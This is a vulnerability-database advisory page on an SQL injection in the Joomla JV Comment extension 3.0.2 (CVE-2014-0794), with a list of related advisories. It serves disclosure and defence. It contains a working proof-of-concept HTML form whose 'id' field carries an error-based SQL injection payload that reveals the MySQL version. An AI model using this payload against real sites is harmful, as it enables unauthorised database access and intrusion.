Lucene search

K

Joomla! JV Comment扩展'id'参数SQL注入漏洞

🗓️ 10 Feb 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 20 Views

Joomla! JV Comment SQL Injection Vulnerabilit

Show more
Related
Code
ReporterTitlePublishedViews
Family
Packet Storm
Joomla JV Comment 3.0.2 SQL Injection
24 Jan 201400:00
packetstorm
NVD
CVE-2014-0794
26 Jan 201420:55
nvd
Cvelist
CVE-2014-0794
26 Jan 201420:00
cvelist
Exploit DB
Joomla! Component JV Comment 3.0.2 - 'id' SQL Injection
24 Jan 201400:00
exploitdb
Prion
Sql injection
26 Jan 201420:55
prion
0day.today
Joomla JV Comment 3.0.2 SQL Injection Vulnerability
24 Jan 201400:00
zdt
htbridge
SQL Injection in JV Comment Joomla Extension
2 Jan 201400:00
htbridge
securityvulns
SQL Injection in JV Comment Joomla Extension
3 Feb 201400:00
securityvulns
securityvulns
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
3 Feb 201400:00
securityvulns
CVE
CVE-2014-0794
26 Jan 201420:55
cve
Rows per page

                                                The following exploitation example displays version of MySQL database:


<form action="http://[host]/index.php" method="post" name="main">
<input type="hidden" name="option" value="com_jvcomment">
<input type="hidden" name="task"   value="comment.like">
<input type="hidden" name="id"     value="1 AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))">
<input type="submit" id="btn">
</form>
                              

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
10 Feb 2014 00:00Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.01
20
.json
Report